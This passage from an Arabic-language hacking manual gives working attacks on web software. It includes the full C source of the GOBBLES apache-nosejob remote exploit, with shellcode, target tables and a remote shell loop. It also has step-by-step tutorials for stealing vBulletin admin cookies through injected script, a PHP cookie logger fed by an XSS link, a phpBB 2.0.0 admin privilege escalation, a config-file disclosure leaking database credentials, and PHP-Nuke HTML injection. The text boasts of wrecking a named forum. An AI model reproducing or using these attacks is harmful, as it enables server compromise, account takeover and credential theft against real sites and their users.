memcpy(p, shellcode, sizeof(shellcode) - 1); 

p += sizeof(shellcode) - 1; 

PUT_STRING(\\\"\\\\r\\\\n\\\"); 

} 

for (i = 0; i < REP_POPULATOR; i++) { 



٢١٩




PUT_STRING(\\\": \\\"); 

for (j = 0; j < REP_RET_ADDR; j++) { 

*p++ = retaddr & 0xff; 

*p++ = (retaddr >> 8) & 0xff; 

*p++ = (retaddr >> 16) & 0xff; 

*p++ = (retaddr >> 24) & 0xff; 

} 

PUT_BYTES(REP_ZERO, 0); 

PUT_STRING(\\\"\\\\r\\\\n\\\"); 

} 

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"); 

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2); 

PUT_STRING(buf); 


snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", 

MEMCPY_s1_OWADDR_DELTA); 


write(sock, expbuf, p - expbuf); 

progress++; 

if((progress%70) == 0) 

progress = 1; 

if(progress == 1) { 

memset(buf, 0, sizeof(buf)); 

sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport 

%u\\\", 

retaddr, (unsigned int)(p - expbuf), lport); 

memset(buf + strlen(buf), \\' \\', 74 - strlen(buf)); 

puts(buf); 

if(bruteforce) 

putchar(\\';\\'); 

} 

else 

putchar((rand()%2)? \\'P\\': \\'p\\'); 


while (1) { 

٢٢٠




fd_set fds; 

int n; 

struct timeval tv; 

tv.tv_sec = EXPLOIT_TIMEOUT; 

tv.tv_usec = 0; 

FD_ZERO(&fds); 

FD_SET(0, &fds); 

FD_SET(sock, &fds); 


if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) { 

if(FD_ISSET(sock, &fds)) { 

if((n = read(sock, buf, sizeof(buf) - 1)) = 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0) { 

printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n\\\"); 

printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr); 

sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD 

local kernel exploit to gain instant r00t\\\\n\\\"); 

write(sock, expbuf, strlen(expbuf)); 

owned++; 

} 

write(1, buf, n); 

} 

if(FD_ISSET(0, &fds)) { 

if((n = read(0, buf, sizeof(buf) - 1)) < 0) 

exit(1); 

write(sock, buf, n); 

} 

} 

if(!owned) 

break; 

} 

free(expbuf); 

٢٢١




close(sock); 

if(owned) 

return 0; 

if(!bruteforce) { 

fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\"); 

return -1; 

} 

} 

return 0; 

} 

Exploit #2: 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#ifdef __linux__ 

#include 

#endif 

#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */ 

#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another 

bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n\\\" 

#define RET_ADDR_INC 512 




٢٢٢




#define REP_POPULATOR 24 

#define REP_SHELLCODE 24 

#define NOPCOUNT 1024 

#define NOP 0x41 

#define PADDING_1 \\'A\\' 

#define PADDING_2 \\'B\\' 

#define PADDING_3 \\'C\\' 

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s); 

#define PUT_BYTES(n, b) memset(p, b, n); p += n; 

char shellcode[] = 

\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\ 

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\ 

\\x04\\\\x24\\\" 

\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\ 

\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\ 

\\xea\\\\x31\\\" 

\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\ 

\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\ 

\\x7c\\\\x24\\\" 

\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\ 

\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\ 

\\x20\\\\x89\\\" 

\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\ 

\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\ 

\\x14\\\\x89\\\" 

\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\ 

\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\ 

\\xcd\\\\x80\\\" 

\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\ 

\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\ 

\\x04\\\\x24\\\" 

\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\ 

\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\ 

\\x50\\\\xb0\\\" 

\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\ 

\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\ 

\\x41\\\\x80\\\" 

\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\ 

\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\ 

٢٢٣




\\xb0\\\\x5a\\\" 

\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\ 

\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\ 

\\xc0\\\\x50\\\" 

\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\ 

\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\ 

\\x2a\\\\x47\\\" 

\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\ 

\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\ 

\\xcd\\\\x80\\\" 

\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\ 

\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\ 

\\xe3\\\\x50\\\" 

\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\ 

\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\"; 

; 

struct { 

char *type; /* description for newbie penetrator */ 

int delta; /* delta thingie! */ 

u_long retaddr; /* return address */ 

int repretaddr; /* we repeat retaddr thiz many times in the buffer */ 

int repzero; /* and \\\\0\\'z this many times */ 

} targets[] = { // hehe, yes theo, that say OpenBSD here! 

{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36 }, 

{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36 }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 }, 

{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 }, 

{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6, 

36 }, 

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42 }, 

{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 }, 




}, victim; 

٢٢٤




void usage(void) { 

int i; 

printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apachenosejob.c\\\\n\\\\n\\\"); 

printf(\\\"Usage: ./apache-nosejob -h host[:80]\\\\n\\\"); 

printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\"); 

printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\"); 

printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n\\\"); 

printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n\\\"); 

printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd, 

0x080e0000/nbsd.\\\\n\\\"); 

printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to 

overwrite\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\"); 

printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the 

buffer\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n\\\"); 

printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the 

buffer\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n\\\"); 

printf(\\\" Optional stuff:\\\\n\\\"); 

printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for 

shellcode reply\\\\n\\\"); 

printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode 

replies\\\\n\\\"); 

printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\"); 

printf(\\\"\\\\nExamples will be published in upcoming apache-scalp- 

HOWTO.pdf\\\\n\\\"); 

printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n\\\"); 

printf(\\\" ID / Return addr / Target specification\\\\n\\\"); 

for(i = 0; i < sizeof(targets)/sizeof(victim); i++) 

printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type); 

exit(1); 

} 

٢٢٥




int main(int argc, char *argv[]) { 

char *hostp, *portp, *cmdz = DEFAULT_CMDZ; 

u_char buf[512], *expbuf, *p; 

int i, j, lport, sock; 

int bruteforce, owned, progress, sc_timeout = 5; 

int responses, shown_length = 0; 

struct in_addr ia; 

struct sockaddr_in sin, from; 

struct hostent *he; 

if(argc < 4) 

usage(); 


memset(&victim, 0, sizeof(victim)); 

while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1) { 

switch(i) { 

/* required stuff */ 

case \\'h\\': 

hostp = strtok(optarg, \\\":\\\"); 

if((portp = strtok(NULL, \\\":\\\")) == NULL) 

portp = \\\"80\\\"; 

break; 

/* predefined targets */ 

case \\'t\\': 

if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) { 

printf(\\\"Invalid target\\\\n\\\"); 

return -1; 

} 

memcpy(&victim, &targets[atoi(optarg)], sizeof(victim)); 

break; 

/* bruteforce! */ 

case \\'b\\': 

bruteforce++; 

victim.type = \\\"Custom target\\\"; 

victim.retaddr = strtoul(optarg, NULL, 16); 

printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\", 

٢٢٦




victim.retaddr); 

break; 

case \\'d\\': 

victim.delta = atoi(optarg); 

printf(\\\"Using %d as delta\\\\n\\\", victim.delta); 

break; 

case \\'r\\': 

victim.repretaddr = atoi(optarg); 

printf(\\\"Repeating the return address %d times\\\\n\\\", 

victim.repretaddr); 

break; 

case \\'z\\': 

victim.repzero = atoi(optarg); 

printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero); 

break; 

case \\'o\\': 

bruteforce++; 

switch(*optarg) { 

case \\'f\\': 

victim.type = \\\"FreeBSD\\\"; 

victim.retaddr = 0x80a0000; 

victim.delta = -150; 

victim.repretaddr = 6; 

victim.repzero = 36; 

break; 

case \\'o\\': 

victim.type = \\\"OpenBSD\\\"; 

victim.retaddr = 0x80000; 




break; 

case \\'n\\': 

victim.type = \\\"NetBSD\\\"; 

victim.retaddr = 0x080e0000; 


٢٢٧






break; 

default: 

printf(\\\"[-] Better luck next time!\\\\n\\\"); 

break; 

} 

break; 

/* optional stuff */ 

case \\'w\\': 

sc_timeout = atoi(optarg); 

printf(\\\"Waiting maximum %d seconds for replies from 

shellcode\\\\n\\\", sc_timeout); 

break; 

case \\'c\\': 

cmdz = optarg; 

break; 

default: 

usage(); 

break; 

} 

} 

if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) { 

printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap 

style!!)\\\\n\\\"); 

return -1; 

} 

printf(\\\"[*] Resolving target host.. \\\"); 


he = gethostbyname(hostp); 

if(he) 

memcpy(&ia.s_addr, he->h_addr, 4); 

else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) { 

printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp); 

return -1; 

} 

٢٢٨




printf(\\\"%s\\\\n\\\", inet_ntoa(ia)); 

srand(getpid()); 

signal(SIGPIPE, SIG_IGN); 

for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) { 

/* skip invalid return adresses */ 

if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4)) 

continue; 

sock = socket(PF_INET, SOCK_STREAM, 0); 

sin.sin_family = PF_INET; 

sin.sin_addr.s_addr = ia.s_addr; 

sin.sin_port = htons(atoi(portp)); 

if(!progress) 

printf(\\\"[*] Connecting.. \\\"); 


if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) { 

perror(\\\"connect()\\\"); 

exit(1); 

} 

if(!progress) 

printf(\\\"connected!\\\\n\\\"); 

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * 

REP_SHELLCODE) 

+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero 

+ 1024) * REP_POPULATOR)); 

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM 

\\\"\\\\r\\\\n\\\"); 

for (i = 0; i < REP_SHELLCODE; i++) { 



PUT_STRING(\\\": \\\"); 

PUT_BYTES(NOPCOUNT, NOP); 

٢٢٩




memcpy(p, shellcode, sizeof(shellcode) - 1); 

p += sizeof(shellcode) - 1; 

PUT_STRING(\\\"\\\\r\\\\n\\\"); 

} 

for (i = 0; i < REP_POPULATOR; i++) { 



PUT_STRING(\\\": \\\"); 

for (j = 0; j < victim.repretaddr; j++) { 

*p++ = victim.retaddr & 0xff; 

*p++ = (victim.retaddr >> 8) & 0xff; 



} 

PUT_BYTES(victim.repzero, 0); 

PUT_STRING(\\\"\\\\r\\\\n\\\"); 

} 

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"); 

snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2); 



snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta); 


if(!shown_length) { 

printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p - 

expbuf)); 

shown_length = 1; 

} 

write(sock, expbuf, p - expbuf); 

progress++; 

if((progress%70) == 0) 

progress = 1; 

if(progress == 1) { 

printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr); 

for(i = 0; i < 40; i ++) 

٢٣٠




printf(\\\" \\\"); 

printf(\\\"\\\\n\\\"); 

if(bruteforce) 

putchar(\\';\\'); 

} 

else 

putchar(((rand()>>8)%2)? \\'P\\': \\'p\\'); 


responses = 0; 

while (1) { 

fd_set fds; 

int n; 

struct timeval tv; 

tv.tv_sec = sc_timeout; 

tv.tv_usec = 0; 

FD_ZERO(&fds); 

FD_SET(0, &fds); 

FD_SET(sock, &fds); 


if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) { 

if(FD_ISSET(sock, &fds)) { 

if((n = read(sock, buf, sizeof(buf) - 1)) < 0) 

break; 

if(n >= 1) 

{ 

if(!owned) 

{ 

for(i = 0; i < n; i ++) 

if(buf[i] == \\'G\\') 

responses ++; 

else 

responses = 0; 

if(responses >= 2) 

{ 

owned = 1; 

write(sock, \\\"O\\\", 1); 

٢٣١




write(sock, cmdz, strlen(cmdz)); 

printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx, 

repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta, 

victim.retaddr, victim.repretaddr, victim.repzero); 

printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen 

now: \\\"); 


} 

} else 

write(1, buf, n); 

} 

} 

if(FD_ISSET(0, &fds)) { 

if((n = read(0, buf, sizeof(buf) - 1)) < 0) 

exit(1); 

write(sock, buf, n); 

} 

} 

if(!owned) 

break; 

} 

free(expbuf); 

close(sock); 

if(owned) 

return 0; 

if(!bruteforce) { 

fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\"); 

return -1; 

} 

} 

return 0; 

} 

٢٣٢




‏((قدتمتجریبها وإختبارها منقبل angels-bytes.comقبلوضعهالكم هنا )) 

وهذي وصلةتنزیلالبرنامج 

http://www.angels-bytes.com/?show=tools&action=info&id=19 

..... 

٢٣٣




" 

اختراق المنتدیات من نوع 

" vBulletin2,2,0 

$$$$$$ 

من قول 

$$$$$$ 

--------- 

: 

--------- 

مقدمة 

الموضوع ‏:اختراق ال vBulletin 

تركیب سیرفر على جهازكالشخصي)‏ + متصفحانترنت(‏ 


المستوى 

اكسبلورر)‏ . 

) WebServer : 

: متوسط 

ملاحظة : هذهالطریقةلس تلل vBulletinفقط ‏!!یمكنانتجربها علىانواعاخرى من المنتدیات 

. 

---------- 

: 

---------- 

الثغرة 

تنقسم طریقةالعملالى عدةاقسام ‏..أولا بع ضالسكربتاتالخبیثةالتيتسرقالكوكیزبالاضافةالىجعل 

المنتدى یستقبل 

بیانات من مكان خاطيء ‏..لكن یشترطان یسمح المنتد ى بأكواد ال .. HTML 

قم بكتابة موضو ع جدیداو رد 

هذا الكود 

‏(في منتد ى یدعمال ( HTML ‏..ثم اكتباي موضو ع والص قبینالسطور 

: 

script>document.write(' 

';




١٠١٢٤٤٤٠٦٤=[٢٠ ؛%‏ bblastvi ٢٠ 

sit=1011983161 

فكرقلیلاالان ‏..این الباسورد ؟؟ 

الباسورد موجودةلكنبطریقة مشفرة یصعبكسرها ‏..اذن مالحل ؟ 

قمبنسخالكود الذي وجدته والصقهفيالمتصفح ‏..بهذا الشكل 

http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[ 

[password hash 

ستجد عبارة : ‏"أهلا بعودتك یا ‏(اسمالذي سرقت منهالكوكیز....)‏ " 

في هذه الحالةانتالانتستطیع التحكم بكل شي وكانك مدیرالمنتدى الذي سرقت منهالكوكیز)‏ .. 

لكننا نحتاج الىكلمة المرورللدخولالىلوحة التحكم ‏..اذهبالى التحكم)‏ وقم بتعدیلا لبریدالالكتروني 

الىبریدك الخا ص وثمقم بتسجیلالخروج 

تستطیعاستقبالبرید یحتويباسوردالادمن 

) 

) 

‏..ثماذهب الىاداة .. Forgot Password وعندها 

.. 

اعتقدانكتعلم ما یجبانتفعله بعد ذلك ‏!!ادخلالىلوحة التحكم وافعل ماتشاء 

! .. 

------------ 

- : 

----------- 

الحل 

للحمایة من هذه الثغرةقمباغلاقال HTMLفي ) المنتد ى ‏+الرسائلالخاصة ‏+التواقیع ‏+التقویم + ... 

( 

‏(واي منفذ یمكن من خلاله وضعكود HTMLباي صورةكانت ( 

كما یجبا غلاكودال IMG ‏..لانه ببساطةبامكانكاستخدامهبدلكلمة ‏فاذا وضعت 

او ‏او 

ايكلمةاخر ىفانه سیتمتنفیذالسكرب تبشكلاوباخر ‏...لذاكن حذرا واغلق هذهالمنافذ 

. 

. Be Secret .. Dont' be Lamer 

تاریخاكتشا فالثغرة 

تمتجربتها علىالاصدار 

٢٠٠٢- ١ - ٣١ : 

٢٫٢٫٠ وهيتعملبنجاح .... 

٢٣٥


" vBulletin 


ثغرة في منتدیات‎2,2,9‎ 


" 

$$$$$$$$$$$$$$$ 

 

$$$$$$$$$$$$$$$$ 

الكاتب:‏ لا 

ر د‏ 

هذه الثغرة خطیرة جداوتؤديبحایة المنتدیا ت....‏‎2.2.9‎ vBulletin 

المهم شرحهاكالتالي : 

١ ‏-انسخالكود واحفظهبالمفكرةبامتدادphp 




Print ($Footer); 

*/ 

Switch ($HTTP_GET_VARS['Action']) { 

Case "Log": 

$Data = $HTTP_GET_VARS['Cookie']; 

$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex 

(MD5 (NULL)))))); 

$Log = FOpen ($LogFile, "a+"); 

FWrite ($Log, Trim ($Data) . "\n"); 

FClose ($Log); 

Print (""); 

Break; 

Case "List": 

If (!File_Exists ($LogFile) || !In_Array ($Records)) { 

Print ("There are No Records"); 

Exit (); 

} 

Else { 

Print (""); 

$Records = Array_UniQue (File ($LogFile)); 

Print (""); 

Print (".:: Statics\n"); 

Print ("\n"); 

Print ("o Logged Records : " . Count (File ($LogFile)) . "\n"); 

Print ("o Listed Records : " . Count ($Records) . " [Not 

Counting Duplicates]\n"); 

Print ("\n"); 

Print (".:: Options\n"); 

Print ("\n"); 

If (Count (File ($LogFile)) > 0) { 

$Link['Download'] = "[Download]"; 

} 

Else{ 

$Link['Download'] = "[No Records in Log]"; 

} 

Print ("o Download Log : " . $Link['Download'] . "\n"); 

٢٣٧




Print ("o Clear Records : [Y]\n"); 

Print ("\n"); 

Print (".:: Records\n"); 

Print ("\n"); 

While (List ($Line[0], $Line[1]) = Each ($Records)) { 

Print ("" . $Line[0] . ": " . $Line[1]); 

} 

} 

Print (""); 

Break; 

Case "Delete": 

@UnLink ($LogFile); 

Print ("Deleted Succsesfuly") Or Die 

("Error: Cannot Delete Log"); 

Print (""); 

Break; 

} 

?> 

-٢ 

ارفع الملفلموقع یدعم php 

اجعلالض حیة یضغط على هذا اللینك 

member2.php?s=[Session]&action=viewsubscription&perpage=[Script 

Code] 

واستبدال[‏code [script 

بهذا 

location='Http://[ مكان المل فالذيتمتحمیله 

] ?Action=Log&Cookie='+(document.cookie); 

4- 

إ ذهبألى هذا العنوان 

مكان/‏ المل فالذيتمتحمیلهAction=List‏?‏ http://%20 

-٣ 

.... 

٢٣٨


" phpbb 2.0.0 


اختراق منتدیات 


" 

$$$$$$$$$ 

من ق ول 

$$$$$$$$$ 

phpbb 2.0.0 

وهو شبیهبال vb 

وهو سهل جدابل یعتبرتاافه 

یاالله سموباالله 

PhpBB2 

في ملف admin_ug_auth.php 

الوصف : 

یمكنك من خلال هذهالثغرةأنتأخذتصریح بأنتكون مدیر والمشر ف العام علىالمنتدى 

وبذلك یمكنك الدخولالىلوحةالتحكم متى شئ ت 

الأصدار : 

٢٫٠٫٠ 

لتجربة الثغرةاولا سجلبالمنتدى 

ثماحفظ رقم عضویتكبالمنتدى 

بعدهاافتح المفكرة وانسخ مایليالیها 

 

 

 

 

method="post" form> 

action="http://www.domain_name/board_directory/admin/admin_ug_au 




 

 

 

عدل هذاالعنوانالى عنوان الموقع المستهد ف 

http://www.domain_name/board_directory 

اخفظهبامتدادhtml 

عندماتدخل الىالصفحةالتيقمتبحفظها سو فتجد 

قائمة والتيیتماختیارالتصریحالذيتریده لتطبیقالثغرةاخترتصریح 

ثمبالمربع الجانبي شع رقم عضویتكبالمنتدى 

أضغط زر 

بعدها سو فتاتیك شاشةتسجیلالدخول ضعاسمالمستخدم وكلمة المرورالخاصةبك 

ثم سو فتجد نفسكفيلوحةتحكمالمنتدى ‏!!أفعل ماتریدالمنتد ى منتداك 

وسلااامتكم شفتو سهولت الدرس وهو صرااحه منقولبستعرفو ما حبی تانزلهالا وعلیهتطبیق 

Administrator 

submit 

شووفوو المنتدا ذا 

http://forums.xos.ca/ 

تدمر والحمد الله عقبالالمواقعالبااقیه...‏ 

٢٤٠




‏"ثغرة جمیلة في 

php في المواقع 

" 

!!! 

"powered by wihphoto" 

http://www.*****.com/wihphoto/index.php 

$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$ 

تعتبر هذهالثغرة جمیله ومیسره وسهله جدا وهيتعتمد على البح ثالعشوائي وهي متوفرهفياغلب 

المواقع المستهدفه...‏ 

بسماالله نبدأ،،،‏ 

مهمتناالأساسیةفي هذهالثغرهالبحثقي جوجلاوفيأي محركبحثاخر 

سو ف نب حث عنكلمه وسینتجلنا عددكبیییییییر من المواقعالمصابهبها 

سو ف یجدلنا مواقعكثیراخترأي واحد منها 

اذهبالى جوجل واكتب 

بعد ذلك علیك 

بحذ ف التالي من عنوانالموقع 

سو ف نقومبحذ ف هذه الكلمه index.php ونسبدلهابهذاالعنوان 

sendphoto.php?album=..&pic=config.inc.php 

سو فتظهرلنا صفحه یطلبفیهاادخالالبریدالذيتریدارسال مل ف الكونفجله .. اكتببرید مثلا 

maxhak2000@hotmail.com 

انتظر ذواني سو فتصلك رساله ستجدفیها ملف مرفقاضغط علیه وشغله ### راح یجیككلاامكثیر 

الشيءالي راح نستفید منه اكثر شيءهو هذا 

// MySQL-DB Einstellungen 

// ====================== 

$database = "usr_web1_5"; //MySQL Datenbankname 

اسمقاعدة > عنوانقاع البیانات ) 

$sqluser = "web1"; //MySQL Username 

$sqlpass = "q+q27rym"; //MySQL Passwort 

اسمالمستخدم




اوكيالآ ن جبناالمعلوماتالي نحتاجهاكلهااليباقي علینا دحین ندخل علىقاعدةالبیاناتاو ندخل على 

الصورللدخول علىالصورنتبعالینكالتالي::‏ 

.... 

http://www.*****.com/wihphoto/admin.php 

.... 

ونضعالباسورد حق مدیرقاعدةالبیانات ونعدلفيالصور زي مانبغى 

هناك بع ضالأشخا صالذین یردیدونامتلاكالموقعكاملااواختراقهكاملا هناك بع ضالطرقلفعل ذلك 

::: 

أولا/ادخل عن طریقالأ فتيبي FTP وندخل الباسورد حقالمدیر واسمالمستخدم مو حقالصور 

بع ضالأحیانتنجحاذاكان الأسم والباسورد مطاب قللباسورد حق مل فالكونفج.‏ 

ثانیا/‏ عن طریقالدخوللقاعدةالبیانات والعبفیها وامتلاك الموقع عن طریقها هناكبرامجتستطیع من 

خلالها الدخول علىقاعدةالبیانات مثلبرنامج MySQL Front وهوبرنامج جیدأو عن طریق 

الأكسس وغیرها منالطریق والبرامج 

٢٤٢


ثغرة في 

" php nuke 

" 


$$$$$$$$ 

الكاتب:‏ ایسر 

$$$$$$$$ 

فیهثغرهفيال php nuke 

مكانالصورهالشخصیه ....... 

حبیتاقولكم علیها 

.. الثغره دي تتیحلكتنفیذاكوادالهتمل والجافابدل 

- 

!!! 

انا عار فانكماول ماتقرواالسطر الاولاكیدا غلبكم حیشتمنيباكثرالالفاظاباحه ‏-بس عاديانا متعود 

و یقولایه دهباههو مدخلنا هنا عشان یقولناتنفیذ اكواد هتمل و جافابدلالصورهالشخصیه ؟؟؟!!!!بس 

؟؟؟!!!اما عبیطاوي 

لكنفياخرالموضو ع حقولكم ممكنتعملوابیهاایه 

..... 

المهمان الثغرهكالتالي 

ساحاولانياعمل زي مواقع السیكیوریتيالمحترمهلمتیجيتعر ضثغره 

( 

) : 

الاصداراتالمصابه 

PHP Nuke versionh 6.0 والاقل منها 

الاستخدام 

: 

: 

تستخدمكماقلتفيتنفیذ اكواد الهتمل والجافا سكریب ت من خلال مكان صورهمالشخصیه.‏ 

ملخ ص عامللثغره:‏ 

.. 

اي مستخدم عندم یقومبالتسجیلفيالمجلهفانه یطالبباختیار صوره شخصیه و ذلك من خلال مجموعه 

منالصورالموجودهفيالمجلد هذا....‏ /images/forum/avatars 

عندئذتقوم المجلهبوضعاسمالصورهفيالداتابیز .. ولكنها لاتقومبوضعايكودايانهاذااستطا ع 

اي یوزران ی حصل علىكودفورم المجله واستطا عان یغیر صندوقاختیارالصورهالشخصیهالى 

صندوق text عادي اذناعتقدانه ممكنان یكتبكود الهتمل اللي هوه عایزه 

الاكسبلویت:‏ 

اولا علیك نتقومبالتسجیلفيالمجله والدخول بعد ذلك والذهابالى صفحه Your Account و منها 

الذهاب الى صفحه Your Info بعد ذلك علیكباظهار سورسكودالصفحه من خلال view source و 

الب حث عنكلمهuid 

لازمتلاقي حاجه زيكده 

!!!! 

 

: 

٢٤٣




كده یبقىانت عرفت رقمالاي دي اللي هوهفي المثالكان ... ٢١١١ 

علیك بعد ذلك نكتحفظالكود دهفيالنوتباد وتسمیه 

http://nukesite/ الى عنوان المجلهالهد ف 

اياسمبامتداد html 

:...... 

مع ملاحظهتغییر 




